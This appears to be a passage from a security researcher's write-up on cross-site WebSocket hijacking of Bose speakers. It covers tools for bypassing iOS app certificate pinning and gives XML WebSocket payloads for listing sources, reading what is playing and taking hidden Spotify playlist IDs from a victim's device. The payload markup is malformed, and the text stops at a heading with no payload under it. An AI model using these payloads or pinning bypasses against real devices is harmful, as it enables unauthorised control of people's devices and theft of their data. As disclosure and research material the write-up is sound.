RFC 6455

The WebSocket Protocol enables two-way communication between a client running untrusted code in a controlled environment to a remote host that has opted-in tocommunications from that code. The security model used for this is the origin-based security model commonly used by web browsers.

## Websocket 101 Starts with an HTTP handshake

  • Data frames don’t have HTTP overhead
  • Data frames don’t have HTTP security
  • No headers, cookies, authentication

Here’s something interesting from RFC:

In order to undesrtand the communication between the speaker and the app. We need to remove the TLS cert pinning which is embedded in the app itself. One of the easiest way worth trying on a jailbroken iOS device is to use: https://github.com/nabla-c0d3/ssl-kill-switch2

This approach didn’t work me. There are number of ways to decrypt ios app traffic.

  • First is basic Burp Suite setup .
  • Second way to do it is to setup a burp suite with proxy in ios app
  • Third way might be to use MITM proxy
  • Fourth way is to use burp mobile assist
  • Fifth way is to use Burp with VPN
  • Last way that actually works is to use IPA crack -> Clutch 2.0

Guide: https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet

One of the most suggested easy way is to use Needle: https://github.com/mwrlabs/needle. With Needle you can easily load modules into the running process aka ios app. In my case I am using a modified version of Cert pinning bypass module and injected it within process to intercept all requests and undestand the flow of information.

Needle ios

Here’s a quick demo of remotely controlling a BOSE device from any internet website a victi might be browsing.

Here’s some of the payloads to retreive information and lookout for open devices over the internet.

Get all sources:

<msg<header deviceID=”EC24B8A7C786” url=”sources” method=”GET”<request requestID=”6”<info type=”new”/</request</header</msg

Get now playing:

<msg<header deviceID=”EC24B8A7C786” url=”now_playing” method=”GET”<request requestID=”11”<info type=”new”/</request</header</msg

Steal UUID of hidden Spotify playlists:

<msg<header deviceID=”EC24B8A7C786” url=”navigate” method=”POST”<request requestID=”165”<info mainNode=”navigateMenu” type=”update”/<sourceItem source=”RECENTS”/</request</header<body<navigate menu=”recents”/</body</msg

GET Local music server contents: